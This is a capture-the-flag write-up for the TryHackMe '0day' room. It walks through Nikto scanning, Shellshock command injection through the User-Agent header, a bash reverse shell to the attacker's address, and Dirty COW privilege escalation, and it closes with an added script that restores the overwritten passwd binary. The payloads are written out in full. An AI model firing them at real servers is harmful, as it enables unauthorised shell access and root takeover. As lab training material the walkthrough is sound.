0day - Tryhackme Writeup!


1. Enumeration

nikto --url {IP}

---------------------------------------------------------------------------
+ Target IP:          {IP}
+ Target Hostname:    {IP}
+ Target Port:        80
+ Start Time:         2020-10-25 10:38:36 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: bd1, size: 5ae57bb9a1192, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header '93e4r0-cve-2014-6278' found, with contents: true
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/index.html: Admin login page/section found.
+ 8699 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2020-10-25 10:44:25 (GMT1) (349 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

2. Exploitation

Nikto flagged /cgi-bin/test.cgi as vulnerable to Shellshock (CVE-2014-6271). Apache hands every request header to the CGI script as an environment variable, and the unpatched bash on the target parses a value that starts with "() {" as a function definition and then executes whatever follows it. The two echo calls emit the header line and the blank line that the CGI interface requires; without them Apache returns a 500 and discards the command output. Reading /etc/passwd through the User-Agent header confirms code execution and reveals the local user ryan:

curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" http://{IP}/cgi-bin/test.cgi

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ryan:x:1000:1000:Ubuntu 14.04.1,,,:/home/ryan:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

3. Gain Access

The same vector carries a bash reverse shell. Start a listener on port 9001 of your VPN address first; the shell lands as www-data, the account Apache runs the CGI script as (see the prompt in the next section).

bird@security:~# curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/{YOUR_OVPN_IP}/9001 0>&1';" http://{IP}/cgi-bin/test.cgi

4. Post Exploitation

Go inside the home directory

www-data@ubuntu:/usr/lib/cgi-bin$ cd /home/ryan

list all files

www-data@ubuntu:/home/ryan/$ ls
user.txt

print the user flag from the text file in your terminal

www-data@ubuntu:/home/ryan/$ cat user.txt
THM{FLAG}

5. Priv Escalation

The cow and socat binaries found in /tmp were transferred to the box earlier (the upload step is not shown); socat is not used here. cow is a compiled Dirty COW exploit (CVE-2016-5195, a race condition in the kernel's copy-on-write handling that lets an unprivileged user write to read-only files), which the target's Ubuntu 14.04 kernel is unpatched against. It backs up the setuid-root /usr/bin/passwd, overwrites it with a root shell payload and executes it. Keep /tmp/bak: passwd stays broken until you copy it back.

www-data@ubuntu:/home/ryan$ cd /tmp
www-data@ubuntu:/tmp$ ls
cow  socat
www-data@ubuntu:/tmp$ chmod +x cow
www-data@ubuntu:/tmp$ ./cow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 47032
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Dont forget to restore /tmp/bak
thread stopped
thread stopped
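The exploit itself warns you to restore the backup it made. As an added example, not from the writeup or from the exploit, this POSIX shell function copies the backup back and checks the restored file against the md5 manifest dpkg keeps for the passwd package (/var/lib/dpkg/info/passwd.md5sums on Debian and Ubuntu), so you know the box is back to the packaged binary rather than to a second tampered copy. Paths are parameters so the function can be exercised on scratch files; on the box, run it as root from the shell you just got.

```shell
#!/bin/sh
# Added example: restore a binary that a Dirty COW exploit overwrote (here
# /usr/bin/passwd, backed up to /tmp/bak) and verify the restored copy against
# the dpkg md5 manifest before trusting it. Not part of the original writeup.

restore_and_verify() {
    backup="$1"     # copy made by the exploit, e.g. /tmp/bak
    target="$2"     # overwritten binary, e.g. /usr/bin/passwd
    manifest="$3"   # dpkg manifest, e.g. /var/lib/dpkg/info/passwd.md5sums
    [ -f "$backup" ] || { echo "no backup at $backup" >&2; return 2; }
    cp -p "$backup" "$target" || return 1
    # Manifest lines look like "<md5>  usr/bin/passwd" (path relative to /).
    rel="${target#/}"
    expected=$(awk -v p="$rel" '$2 == p { print $1 }' "$manifest")
    actual=$(md5sum "$target" | awk '{ print $1 }')
    if [ -z "$expected" ]; then
        echo "$rel not listed in $manifest" >&2
        return 3
    fi
    if [ "$expected" = "$actual" ]; then
        echo "$target restored, checksum matches the package"
        return 0
    fi
    echo "checksum mismatch for $target; the backup is not the packaged binary" >&2
    return 4
}

# Usage on the target (as root):
#   restore_and_verify /tmp/bak /usr/bin/passwd /var/lib/dpkg/info/passwd.md5sums
```

A non-zero return means the restored file still differs from what the package shipped, which on a shared lab box or a real engagement is the cue to reinstall the package rather than leave a modified setuid binary behind.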

6. Finding the root flag

root@ubuntu:/tmp# whoami
root

Go inside the root directory and list all files

root@ubuntu:/tmp# cd /root && ls
root.txt

print the root flag from the text file in your terminal

root@ubuntu:/root# cat root.txt
THM{FLAG}